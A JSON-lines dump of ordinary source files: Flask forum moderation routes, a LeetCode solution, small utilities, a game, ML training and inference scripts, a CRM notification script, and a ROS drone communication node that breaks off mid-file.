c.threads.Collections.find_one({\"id\":int(n)})\n if thread:\n if admin(uid):\n r += html.delthread(thread[\"id\"])\n return page(r,uid)\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/delpost-\",methods=['GET','POST'])\ndef delpost(n):\n uid = getUID()\n\n if request.method == \"POST\":\n pid = int(request.form[\"pid\"])\n post = c.posts.Collections.find_one({\"id\":pid})\n \n if post:\n if admin(uid) and getThread(post['tid'])['pid'] != post['id']:\n utils.delpost(pid)\n if \"ajax\" in request.form:\n return \"/thread-%d?type=4\"%(post['tid'])\n else:\n return redirect(\"/thread-%d?type=51\"%(post['tid']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.postDoesNotExist(),uid)\n else:\n r = \"\"\n \n post = c.posts.Collections.find_one({\"id\":int(n)})\n if post:\n if admin(uid) and getThread(post['tid'])['pid'] != post['id']:\n r += html.delpost(post[\"id\"])\n return page(r,uid)\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.postDoesNotExist(),uid)\n \n@app.route(\"/hidepost-\")\ndef hidepost(n):\n uid = getUID()\n\n post = c.posts.Collections.find_one({\"id\":int(n)})\n if post:\n if admin(uid):\n utils.hidepost(post['id'])\n return redirect(\"thread-%d\"%(post['tid']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.postDoesNotExist(),uid)\n\n@app.route(\"/unhidepost-\")\ndef unhidepost(n):\n uid = getUID()\n\n post = c.posts.Collections.find_one({\"id\":int(n)})\n if post:\n if admin(uid):\n utils.unhidepost(post['id'])\n return redirect(\"thread-%d\"%(post['tid']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.postDoesNotExist(),uid)\n\n@app.route(\"/hidethread-\")\ndef hidethread(n):\n uid = getUID()\n\n thread = c.threads.Collections.find_one({\"id\":int(n)})\n if thread:\n if admin(uid):\n utils.hidethread(thread['id'])\n return redirect(\"thread-%d?type=2\"%(thread['id']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/unhidethread-\")\ndef unhidethread(n):\n uid = getUID()\n\n thread = c.threads.Collections.find_one({\"id\":int(n)})\n if thread:\n if admin(uid):\n utils.unhidethread(thread['id'])\n return redirect(\"thread-%d?type=3\"%(thread['id']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/lockthread-\")\ndef lockthread(n):\n uid = getUID()\n\n thread = c.threads.Collections.find_one({\"id\":int(n)})\n if thread:\n if admin(uid):\n utils.lockthread(thread['id'])\n return redirect(\"thread-%d?type=4\"%(thread['id']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/unlockthread-\")\ndef unlockthread(n):\n uid = getUID()\n\n thread = c.threads.Collections.find_one({\"id\":int(n)})\n if thread:\n if admin(uid):\n utils.unlockthread(thread['id'])\n return redirect(\"thread-%d?type=5\"%(thread['id']))\n else:\n return page(html.permissionDenied(),uid)\n else:\n return page(html.threadDoesNotExist(),uid)\n\n \nif __name__ == \"__main__\":\n app.run()\n\n","sub_path":"DebateCircle/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310029872","text":"class Solution:\n def finalPrices(self, prices: List[int]) -> List[int]:\n ans = []\n for i in range(len(prices)) :\n dis = 0\n for j in range(i+1,len(prices)) :\n if prices[i] >= prices[j] :\n dis = prices[j]\n break\n ans.append(prices[i]-dis)\n return ans","sub_path":"1475. Final Prices With a Special Discount in a Shop.py","file_name":"1475. Final Prices With a Special Discount in a Shop.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552788867","text":"# coding=utf8\r\nimport docx\r\nfrom en2cn_translate import lookup\r\nfrom datetime import datetime\r\nfrom argparse import ArgumentParser\r\n# help(docx.document)\r\n\r\nparser=ArgumentParser()\r\nparser.add_argument('file',help='the doc path of which you want to translate')\r\nargs=vars(parser.parse_args())\r\n\r\n\r\n# FILENAME='待查英语单词.docx'\r\nFILENAME=args['file']\r\ndef isword(str1):\r\n '''\r\n 判断是否是英语单词\r\n :param str1:\r\n :return:\r\n '''\r\n if not (all(ord(c) < 128 for c in str1) ):\r\n return False\r\n if type(str1)!=str:\r\n print(str1.__class__)\r\n return False\r\n if '--->' in str1:\r\n return False\r\n if len(str1)>1:\r\n return True\r\n\r\n\r\n return False\r\ndef translate_doc():\r\n try:\r\n doc=docx.Document(FILENAME)\r\n for para in doc.paragraphs:\r\n if isword(para.text.strip()):\r\n para.text=para.text.strip()+'--->'+lookup(para.text.strip())\r\n filename=FILENAME.split('.')[0]+datetime.now().strftime('%Y%y%d%H%M%S')+'.docx'\r\n doc.save(FILENAME)\r\n except PermissionError as e:\r\n print('文件被占用,请先关闭!')\r\nif __name__ == '__main__':\r\n translate_doc()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"doc_read.py","file_name":"doc_read.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"564188810","text":"import sys\n\n\ndef split(filename, interval=1000) -> int:\n \"\"\"\n Splits the [file] into chunks of equal length of [interval] except the last file\n Returns the number of files split into.\n \"\"\"\n with open(filename, 'r') as inp:\n lines = []\n ind = 0\n for x, line in enumerate(inp.readlines()):\n lines.append(line)\n if (x+1) % interval == 0:\n ind += 1\n with open(f\"out{ind}.txt\", 'w+') as out:\n out.writelines(lines)\n lines.clear()\n ind += 1\n with open(f\"out{ind}.txt\", 'w+') as out:\n out.writelines(lines)\n lines.clear()\n\n return ind\n\n\nif __name__ == '__main__':\n # python server\\scripts\\split.py corpora\\out.txt\n\n assert len(sys.argv) == 2\n\n print(\"Number of files\", split(sys.argv[1]))\n","sub_path":"server/scripts/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"408841274","text":"from pygamii.objects import Object\nfrom pygamii.action import Action\nfrom pygamii.audio import Audio\nfrom gifts import get_gift\nimport random\n\n\nclass Enemy(Object):\n is_kill = False\n kill_animation = False\n kill_steps = 5\n explosion_audio = Audio('songs/explosion.ogg')\n\n def __init__(self, *args, **kwargs):\n super(Enemy, self).__init__(*args, **kwargs)\n self.gift_class = get_gift()\n if self.gift_class:\n self.color = self.gift_class.color\n\n def kill(self):\n if not self.kill_animation:\n self.scene.score.points += 5\n self.explosion_audio.song.set_volume(0.25)\n self.explosion_audio.play()\n self.kill_animation = True\n self.speed = 10\n\n def is_live(self):\n return not self.is_kill and not self.kill_animation\n\n def move(self):\n if self.kill_animation:\n if self.kill_steps % 2:\n self.color = 'red'\n else:\n self.color = 'white'\n self.kill_steps -= 1\n if self.kill_steps == 0:\n self.is_kill = True\n if self.gift_class:\n gift = self.gift_class()\n gift.x = self.x\n gift.y = self.y\n self.scene.add_object(gift)\n else:\n self.y += 1\n\n def on_colision(self, obj):\n if self.scene.airplane is obj and obj.is_live():\n self.kill()\n obj.kill()\n\n\nclass SimpleAirplaneEnemy(Enemy):\n y = -2\n height = 4\n width = 5\n color = 'yellow'\n speed = 5\n _moving = True\n to_render = '\\n'.join([\n ' ▄▄▄ ',\n ' █ ',\n '█████',\n ' ▀ ',\n ])\n\n def __str__(self):\n return self.to_render\n\n\nclass EnemyGenerator(Action):\n interval = 3\n\n def __init__(self, scene, *args, **kwargs):\n super(EnemyGenerator, self).__init__(scene, *args, **kwargs)\n\n def do(self):\n airplane = SimpleAirplaneEnemy()\n airplane.x = random.randrange(0, self.scene.cols - airplane.width)\n self.scene.add_object(airplane)\n\n def stop(self):\n super(EnemyGenerator, self).stop()\n","sub_path":"examples/flycombat/enemies.py","file_name":"enemies.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38828233","text":"#!/usr/bin/env python3\n\n\"\"\"\nCode from http://twiecki.github.io/blog/2016/06/01/bayesian-deep-learning/\n\"\"\"\nimport pymc3 as pm\nimport theano\nimport theano.tensor as T\nimport numpy as np\nimport seaborn as sns\n\nfrom sklearn.preprocessing import scale\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.datasets import make_moons\n\nimport matplotlib.pyplot as plt\n\n# Generate our dataset\nX, Y = make_moons(noise=0.2, random_state=0, n_samples=1000)\nX = scale(X)\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.5)\n\n# Build the structure for our NN\nann_input = theano.shared(X_train)\nann_output = theano.shared(Y_train)\n\nn_hidden = 5\n\ninit_1 = np.random.randn(X.shape[1], n_hidden)\ninit_2 = np.random.randn(n_hidden, n_hidden)\ninit_out = np.random.randn(n_hidden)\n\n# Build the generative procedure\nwith pm.Model() as model:\n\n # Each layer in the NN is defined by the set of weights\n # Bayesian because we have priors...\n w_in_1 = pm.Normal('w_in_1', 0, sd=1, shape=(X.shape[1], n_hidden), testval=init_1)\n w_in_2 = pm.Normal('w_in_2', 0, sd=1, shape=(n_hidden, n_hidden), testval=init_2)\n w_out = pm.Normal('w_out', 0, sd=1, shape=(n_hidden,), testval=init_out)\n \n # Defining the activation functions\n act_1 = T.tanh(T.dot(ann_input, w_in_1))\n act_2 = T.tanh(T.dot(act_1, w_in_2))\n act_out = T.nnet.sigmoid(T.dot(act_2, w_out))\n \n # We are doing classification so our likelihood is a Bernoulli\n out = pm.Bernoulli('out', act_out, observed=ann_output)\n\nwith model:\n # Draw samples from our model. Here we use ADVI.\n v_params = pm.variational.advi(n=50000)\n trace = pm.variational.sample_vp(v_params, draws=5000)\n \n # Now we make predictions by sampling from the posterior\n ann_input.set_value(X_test)\n ann_output.set_value(Y_test)\n ppc = pm.sample_ppc(trace, model=model, samples=500)\n pred = ppc['out'].mean(axis=0) > 0.5\n \n # The prediction accuracy is generated from the posterior mean\n # of the samples. This should correspond to ML under squared loss.\n print(\"Accuracy = {}%\".format((Y_test == pred).mean() * 100))\n\n# Plotting everything\n# First our predictions\nfig, ax = plt.subplots()\nax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])\nax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')\nsns.despine()\nax.set(title=\"Predicted labels in testing set\", xlabel='X', ylabel='Y')\nplt.show()\n\n# Now the probability surface\ngrid = np.mgrid[-3:3:100j, -3:3:100j]\ngrid_2d = grid.reshape(2, -1).T\ndummy_out = np.ones(grid.shape[1], dtype=np.int8)\n\n# Generate posterior samples over the grid\nann_input.set_value(grid_2d)\nann_output.set_value(dummy_out)\nppc = pm.sample_ppc(trace, model=model, samples=500)\n\ncmap = sns.diverging_palette(250, 12, s=85, l=25, as_cmap=True)\nfig, ax = plt.subplots(figsize=(10,6))\ncontour = ax.contour(*grid, levels = ppc['out'].mean(axis=0).reshape(100,100), cmap=cmap)\nax.scatter(X_test[pred==0,0], X_test[pred==0,1])\nax.scatter(X_test[pred==1,0], X_test[pred==1,1], color='r')\ncbar = plt.colorbar(contour, ax=ax)\n_ = ax.set(xlim=(-3,3), ylim=(-3,3), xlabel='X', ylabel='Y')\ncbar.ax.set_ylabel(\"Posterior predictive mean probability of class label = 0\")\n\nplt.show()\n\n# Uncertainly levels at each point\ncmap = sns.cubehelix_palette(light=1, as_cmap=True)\nfig, ax = plt.subplots(figsize=(10,6))\ncontour = ax.contourf(*grid, levels = ppc['out'].std(axis=0).reshape(100,100), cmap=cmap)\nax.scatter(X_test[pred==0,0], X_test[pred==0,1])\nax.scatter(X_test[pred==1,0], X_test[pred==1,1], color='r')\ncbar = plt.colorbar(contour, ax=ax)\n_ = ax.set(xlim=(-3,3), ylim=(-3,3), xlabel='X', ylabel='Y')\ncbar.ax.set_ylabel(\"Posterior predictive standard deviation\")\n\nplt.show()\n\n\n","sub_path":"NN/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"645166461","text":"from django.urls import path\nfrom .views import TaskList, TaskDetail, TaskCreate, TaskUpdate, TaskDelete, UserLoginView, RegisterUser\nfrom django.contrib.auth.views import LogoutView\nfrom . import views\n\nurlpatterns = [\n path('', views.landing, name = 'landing'),\n path('login/', UserLoginView.as_view(), name='login'),\n path('logout/', LogoutView.as_view(next_page='login'), name='logout'),\n path('register/', RegisterUser.as_view(), name='register'),\n path('task/', TaskList.as_view(), name = 'tasks'),\n path('task//', TaskDetail.as_view(), name = 'task'),\n path('task-create/', TaskCreate.as_view(), name = 'task-create'),\n path('task-update//', TaskUpdate.as_view(), name = 'task-update'),\n path('task-delete//', TaskDelete.as_view(), name = 'task-delete'),\n]\n","sub_path":"todo/todoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542990158","text":"from driver import Driver\nfrom rider import Rider\nfrom location import Location\n\n\nclass Dispatcher:\n \"\"\"A dispatcher fulfills requests from riders and drivers for a\n ride-sharing service.\n\n When a rider requests a driver, the dispatcher assigns a driver to the\n rider. If no driver is available, the rider is placed on a waiting\n list for the next available driver. A rider that has not yet been\n picked up by a driver may cancel their request.\n\n When a driver requests a rider, the dispatcher assigns a rider from\n the waiting list to the driver. If there is no rider on the waiting list\n the dispatcher does nothing. Once a driver requests a rider, the driver\n is registered with the dispatcher, and will be used to fulfill future\n rider requests.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize a Dispatcher.\n\n @type self: Dispatcher\n @rtype: None\n \"\"\"\n self._a_drivers = []\n self._w_riders = []\n\n def __str__(self):\n \"\"\"Return a string representation of the dispatcher's fleet of drivers.\n\n @type self: Dispatcher\n @rtype: str\n\n\n >>> disp = Dispatcher()\n >>> d1 = Driver('Amaranth', Location(1,2), 1)\n >>> d2 = Driver('Johnny', Location(2,3), 1)\n >>> d3 = Driver('Leia', Location(1,3), 1)\n >>> disp._a_drivers.append(d1)\n >>> disp._a_drivers.append(d2)\n >>> disp._a_drivers.append(d3)\n >>> print(disp)\n Amaranth\n Johnny\n Leia\n \"\"\"\n s = ''\n for driver in self._a_drivers:\n s = s + driver.id + '\\n'\n return s[:-1]\n\n def request_driver(self, rider):\n \"\"\"Return a driver for the rider, or None if no driver is available.\n\n Add the rider to the waiting list if there is no available driver.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: Driver | None\n\n\n >>> disp = Dispatcher()\n >>> d1 = Driver('Amaranth', Location(1,2), 1)\n >>> d2 = Driver('Johnny', Location(2,3), 1)\n >>> d3 = Driver('Leia', Location(1,3), 1)\n >>> disp._a_drivers.append(d1)\n >>> disp._a_drivers.append(d2)\n >>> disp._a_drivers.append(d3)\n >>> r = Rider('Almond', Location(2,4), Location(1,4), 10)\n >>> print(disp.request_driver(r))\n Johnny\n >>> r2 = Rider('Raiden', Location(1,1), Location(1,5), 10)\n >>> print(disp.request_driver(r2))\n Amaranth\n \"\"\"\n if len(self._a_drivers) == 0:\n self._w_riders.append(rider)\n return None\n else:\n l = []\n for driver in self._a_drivers:\n l.append(driver.get_travel_time(rider.origin))\n d = self._a_drivers[l.index(min(l))]\n self._a_drivers.remove(d)\n return d\n\n def request_rider(self, driver):\n \"\"\"Return a rider for the driver, or None if no rider is available.\n\n If this is a new driver, register the driver for future rider requests.\n\n @type self: Dispatcher\n @type driver: Driver\n @rtype: Rider | None\n\n\n >>> disp = Dispatcher()\n >>> d1 = Driver('Amaranth', Location(1,2), 1)\n >>> r = Rider('Almond', Location(2,4), Location(1,4), 10)\n >>> disp.request_driver(r)\n >>> print(disp.request_rider(d1))\n Almond\n \"\"\"\n if len(self._w_riders) == 0:\n self._a_drivers.append(driver)\n return None\n else:\n return self._w_riders.pop(0)\n\n def cancel_ride(self, rider):\n \"\"\"Cancel the ride for rider.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: None\n \"\"\"\n if rider in self._w_riders:\n self._w_riders.remove(rider)\n","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"170847413","text":"import time\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nimport sys\nimport random\nimport os\nfrom nets import models_factory\nfrom utils import tf_util, preprocess\nfrom metpy.io import Level3File\nfrom skimage.external.tifffile import imsave\n\n\n# -----------------------------------------------------------------------------\nFLAGS = tf.app.flags.FLAGS\n\n# data I/O\ntf.app.flags.DEFINE_string('input_images_path', '',\n 'path of input sequence, seperated with comma')\ntf.app.flags.DEFINE_string('save_name', '',\n 'path and file name to save the result')\n\n# model\ntf.app.flags.DEFINE_string('model_name', 'predrnn_pp_inference',\n 'The name of the architecture.')\ntf.app.flags.DEFINE_string('pretrained_model', 'dat/model.ckpt-10000',\n 'file of a pretrained model to initialize from.')\ntf.app.flags.DEFINE_integer('input_length', 1, '')\ntf.app.flags.DEFINE_integer('pred_length', 11,\n 'total input and output length.')\ntf.app.flags.DEFINE_integer('img_width', 64,\n 'input image width.')\ntf.app.flags.DEFINE_integer('img_channel', 1,\n 'number of image channel.')\ntf.app.flags.DEFINE_integer('stride', 1,\n 'stride of a convlstm layer.')\ntf.app.flags.DEFINE_integer('filter_size', 5,\n 'filter of a convlstm layer.')\ntf.app.flags.DEFINE_string('num_hidden', '128,64,64,64',\n 'COMMA separated number of units in a convlstm layer.')\ntf.app.flags.DEFINE_integer('patch_size', 4,\n 'patch size on one dimension.')\ntf.app.flags.DEFINE_boolean('layer_norm', True,\n 'whether to apply tensor layer norm.')\n# inference\ntf.app.flags.DEFINE_integer('batch_size', 1,\n 'batch size for inference.')\n\n\nclass Model(object):\n def __init__(self):\n self.gpus = tf_util.available_gpus()\n self.num_gpus = len(self.gpus)\n if self.num_gpus:\n assert FLAGS.batch_size % self.num_gpus == 0, \"Batch size should be an integral multiple of number of GPUs\"\n # inputs\n self.x = tf.placeholder(tf.float32,\n [FLAGS.batch_size,\n FLAGS.input_length,\n FLAGS.img_width // FLAGS.patch_size,\n FLAGS.img_width // FLAGS.patch_size,\n FLAGS.patch_size * FLAGS.patch_size * FLAGS.img_channel])\n\n x_splits = tf.split(self.x, max(self.num_gpus, 1))\n\n num_hidden = [int(x) for x in FLAGS.num_hidden.split(',')]\n num_layers = len(num_hidden)\n\n pred_seq = []\n devices = self.gpus or ['/cpu:0']\n with tf.variable_scope(tf.get_variable_scope()) as outer_scope:\n for i, d in enumerate(devices):\n with tf.device(d), tf.name_scope('tower_%d' % i):\n pred_ims = models_factory.construct_model(\n FLAGS.model_name, x_splits[i], None,\n num_layers, num_hidden,\n FLAGS.filter_size, FLAGS.stride,\n FLAGS.pred_length, FLAGS.input_length,\n FLAGS.layer_norm)\n pred_seq.append(pred_ims)\n outer_scope.reuse_variables()\n\n with tf.name_scope(\"apply_gradients\"), tf.device(devices[0]):\n self.pred_seq = tf.concat(pred_seq, 0)\n\n # session\n variables = tf.global_variables()\n variables = list(filter(lambda v: 'states_layer' not in v.name and 'states_global' not in v.name, variables))\n self.saver = tf.train.Saver(variables)\n init = tf.global_variables_initializer()\n configProt = tf.ConfigProto()\n configProt.gpu_options.allow_growth = True\n configProt.allow_soft_placement = True\n self.sess = tf.Session(config=configProt)\n self.sess.run(init)\n if FLAGS.pretrained_model:\n self.saver.restore(self.sess, FLAGS.pretrained_model)\n\n def inference(self, inputs):\n feed_dict = {self.x: inputs}\n gen_ims = self.sess.run(self.pred_seq, feed_dict)\n return gen_ims\n\n\ndef main(argv=None):\n\n model = Model()\n\n while True:\n line = input()\n try:\n inf, outf = line.split(',')\n img = np.array(Level3File(inf).sym_block[0][0]['data'], dtype='float32')\n h, w = img.shape\n nw = FLAGS.img_width\n nh = h * nw // w\n img = cv2.resize(img, (nh, nw), interpolation=cv2.INTER_AREA)\n img = img[np.newaxis, np.newaxis, :, :, np.newaxis]\n img = preprocess.reshape_patch(img, FLAGS.patch_size)\n\n pred = model.inference(img)\n pred = preprocess.reshape_patch_back(pred[:, np.newaxis, :], FLAGS.patch_size)\n pred = cv2.resize(pred[0, 0, :, :, 0], (h, w), interpolation=cv2.INTER_CUBIC)\n\n imsave(outf, pred, metadata={'axis': 'YX'})\n print('done')\n\n except Exception as e:\n print('failed:', e)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"473400066","text":"import datetime\nimport helpers.helper_api as helper_api\nimport helpers.helper_config as helper_config\nimport helpers.helper_file as helper_file\nimport json\nimport sys\nimport time\n\nfrom helpers.helper_core import Helper\n\nhelper_core = Helper()\n\nstart_time_seconds = int(round(time.time()))\n\nengagement_check_results_file=sys.argv[1]\nif engagement_check_results_file == '':\n print(\"ERROR PROVIDE A FILE FOR STORING RESULTS\")\n sys.exit()\n#NOTIFICATION LOGIC\nhelper_core.log(start_time_seconds, \"INFO\", \"Notifying users according to results in {}\".format(engagement_check_results_file))\n\nteams_notification_endpoint = helper_config.get_config_item('TEAMS', 'TEAMS_NOTIFICATION_API')\nteams_channel_email_address = helper_config.get_config_item('TEAMS', 'TEAMS_CHANNEL_EMAIL')\nadmin_email_address = helper_config.get_config_item('ADMIN', 'ADMIN_EMAIL')\nmessage_subject_template = helper_config.get_config_item('TEAMS', 'TEAMS_MESSAGE_SUBJECT_TEMPLATE')\n\nengagement_crm_link_template = helper_config.get_config_item('CRM_DATA_MODEL_FIELDS', 'CRM_ENGAGEMENT_LINK_TEMPLATE')\n\n#The order of engagement_name second and msp_engagementid last must be kept\nengagement_keys_of_interest = [\n 'engagement_owner',\n 'engagement_name',\n 'engagement_status',\n 'engagement_sponsor',\n 'engagement_partner',\n 'engagement_start_date',\n 'msp_engagementid'\n]\n\nmessage_subject = message_subject_template.format( datetime.date.today())\nmessage_to = [ teams_channel_email_address, admin_email_address ]\n\nmessage_body = '
'\nhelper_core.log(start_time_seconds, \"INFO\", \"Reading stored in {}\".format(engagement_check_results_file))\nwith open(engagement_check_results_file) as fp:\n results_data = json.load(fp)\n if len(results_data) > 0:\n helper_core.log(start_time_seconds, \"INFO\", \"Items to correct: {}\".format(len(results_data)))\n for result in results_data:\n if len(result['affected_items']) > 0:\n #AFFECTED CHECK INFO\n check_title = \"

Check {:02d}: {} - {}

\".format(result['check_id'], result['check_type'], result['check_description'])\n \n #SELECT FIELDS OF INTEREST IN AFFECTED ENGAGEMENTS\n result_affected_items_all_data = result['affected_items']\n result_affected_items_filtered_data = [ { dict_key_of_interest: result_affected_item_all_data[dict_key_of_interest] for dict_key_of_interest in engagement_keys_of_interest } for result_affected_item_all_data in result_affected_items_all_data ]\n\n check_table = ''\n #Remove redundant info in field name\n engagement_keys_of_interest_filtered = [ one_key.replace(\"engagement_\", \"\").upper() for one_key in engagement_keys_of_interest ]\n #Remove the last field\n engagement_keys_of_interest_filtered.pop()\n check_table_header = ''\n\n check_table_rows = []\n for filtered_engagement in result_affected_items_filtered_data:\n filtered_engagement_values = [ str(filtered_engagement[key_of_interest]) for key_of_interest in engagement_keys_of_interest ]\n\n #The last value 'msp_engagementid' is just for creating a link\n msp_engagementid = filtered_engagement_values.pop()\n engagement_crm_link = engagement_crm_link_template.format(msp_engagementid)\n \n filtered_engagement_values[1] = '{}'.format(engagement_crm_link, filtered_engagement_values[1])\n\n check_table_row = ''\n check_table_rows.append(check_table_row)\n\n check_table += check_table_header\n for check_table_row in check_table_rows:\n check_table += check_table_row\n \n check_table += '
' + ''.join(engagement_keys_of_interest_filtered) + '
' + ''.join(filtered_engagement_values) + '

'\n\n message_body += check_title\n message_body += check_table\n \n #Take emails from owners\n engagement_owner_names = set()\n for result in results_data:\n [engagement_owner_names.add(affected_item['engagement_owner']) for affected_item in result['affected_items']]\n \n engagement_owner_emails = helper_core.get_owner_emails(engagement_owner_names)\n\n [message_to.append(email) for email in engagement_owner_emails]\n \n else:\n helper_core.log(start_time_seconds, \"INFO\", \"No items to correct\")\n message_body = '

No affected items today

' \n\n#CLOSE HTML AND INSERT STYLE\nmessage_body += ''\nmessage_body = message_body.replace('', '
')\nmessage_body = message_body.replace('
', '')\nmessage_body = message_body.replace('', '')\n\n#CONSTRUCT MESSAGE\nmessage = {'message_subject': message_subject, 'message_body': message_body, 'message_to': message_to}\n\n#SENT IT\nhelper_core.log(start_time_seconds, \"INFO\", \"Sending notification\")\nhelper_api.post_to_api(teams_notification_endpoint, message)","sub_path":"3_crm_engagement_notifications.py","file_name":"3_crm_engagement_notifications.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453104705","text":"import pandas as pd\nfrom typing import Dict, Any\n\n\n# 十档Vwap计算公式\ndef depthVwap_worker(data: pd.DataFrame,\n code: str,\n date: str,\n *args,\n **kwargs) -> Dict[str, Any]:\n data['time'] = data['时间'].apply(lambda x: x[-8:])\n l = data['time'] >= '09:25:00'\n data = data[l].copy()\n\n res = {'date': date, 'code': code}\n\n l = data['最新价'] != 0\n res['open'] = data.loc[l, '最新价'].iloc[0]\n res['close'] = data.loc[l, '最新价'].iloc[-1]\n res['low'] = data.loc[l, '最新价'].min()\n res['high'] = data.loc[l, '最新价'].max()\n res['volume'] = data['总量'].iloc[-1]\n res['amount'] = data['总金额'].iloc[-1]\n\n data['amountdiff'] = data['总金额'] - data['总金额'].shift(1)\n data['bid'], data['ask'] = 0, 0\n for i in range(1, 11):\n data['bid'] = data['bid'] + data['挂买价' + str(i)] * data['挂买量' + str(i)] * (1.1 - 0.1 * i)\n data['ask'] = data['bid'] + data['挂卖价' + str(i)] * data['挂卖量' + str(i)] * (1.1 - 0.1 * i)\n data['spread'] = (data['bid'] - data['ask']) / (data['bid'] + data['ask'])\n l_t = (data['time'] >= '09:30:00') & (data['time'] <= '15:00:00')\n l = l_t & (data['amountdiff'] <= data.loc[l_t, 'amountdiff'].quantile(0.5))\n res['Speard'] = data.loc[l, 'spread'].mean()\n res['AmountMean'] = res['amount'] / data['总成交笔数'].iloc[-1]\n price_dict = {'1h': '10:30:00', '2h': '11:30:00', '3h': '14:00:00', '4h': '15:00:00'}\n for key, value in price_dict.items():\n l = data['time'] <= value\n if sum(l) > 0:\n res[key + 'Price'] = data.loc[l, '最新价'].iloc[-1]\n\n vwap_dict = {'0min': '09:29:50', '1min': '09:31:00', '3min': '09:33:00', '5min': '09:35:00',\n '10min': '09:40:00',\n '30min': '10:00:00', '60min': '10:30:00', '90min': '11:00:00', '120min': '11:30:00',\n '150min': '13:30:00', '180min': '14:00:00', '210min': '14:30:00', '240min': '15:00:00'}\n for key, value in vwap_dict.items():\n l = data['time'] <= value\n if sum(l) > 0:\n amount = data.loc[l, '总金额'].iloc[-1]\n volume = data.loc[l, '总量'].iloc[-1]\n res[key + 'Amount'] = amount\n res[key + 'Volume'] = volume\n return res\n","sub_path":"HFDMidDataCal/MidData1/warehouse/SyntheticDepthMid1_worker/depthVwap_worker.py","file_name":"depthVwap_worker.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"97966137","text":"#! /usr/bin/python3\n\nimport collections\nimport rospy\nimport socket\n\nfrom mavros_msgs.msg import Mavlink\nfrom std_msgs.msg import Bool\n\nsystem_id = 0\n\ndef mavlink_cb(system):\n system_id = system.sysid\n\ndef end_mission_cb(end_mission):\n if (system_id == 0):\n pass\n else:\n if (system_id == 17):\n drones_list = ['18', '20']\n elif (system_id == 18):\n drones_list = ['17', '20']\n elif (system_id == 20):\n drones_list = ['17', '18']\n UdpAddress = collections.namedtuple('UdpAddress', 'ip port')\n if end_mission.data == True:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(('0.0.0.0', 5000))\n for drone in drones_list:\n rospy.loginfo(\"Telling Drone \" + drone + \" to end mission!\")\n s.sendto('END_MISSION'.encode('utf-8'), UdpAddress(ip='192.168.1.1'+drone, port=5000))\n\ndef arm_group2_cb(arm_group2):\n drones_list = ['01', '03', '05', '08']\n UdpAddress = collections.namedtuple('UdpAddress', 'ip port')\n if arm_group2.data == True:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.bind(('0.0.0.0', 5000))\n while True:\n for drone in drones_list:\n s.sendto('TAKEOFF'.encode('utf-8'), UdpAddress(ip='192.168.1.1'+drone, port=5000))\n\ndef socket_listen(end_mission_pub):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.settimeout(0.05)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(('0.0.0.0', 5000))\n msg = s.recv(1024)\n if msg.decode(\"utf-8\") == \"END_MISSION\":\n rospy.loginfo(\"Another drone tells me to end mission!\")\n end_mission_pub.publish(True)\n else:\n pass\n except:\n pass\n\ndef comms_main():\n end_mission_pub = rospy.Publisher('end_mission', Bool, queue_size=1)\n rospy.init_node('batman_demo_group1_comms')\n rospy.Subscriber(\"mavlink/from\", Mavlink, mavlink_cb)\n rospy.Subscriber(\"end_mission\", Bool, end_mission_cb)\n rospy.Subscriber(\"arm_group2\", Bool, arm_group2_cb)\n rate = 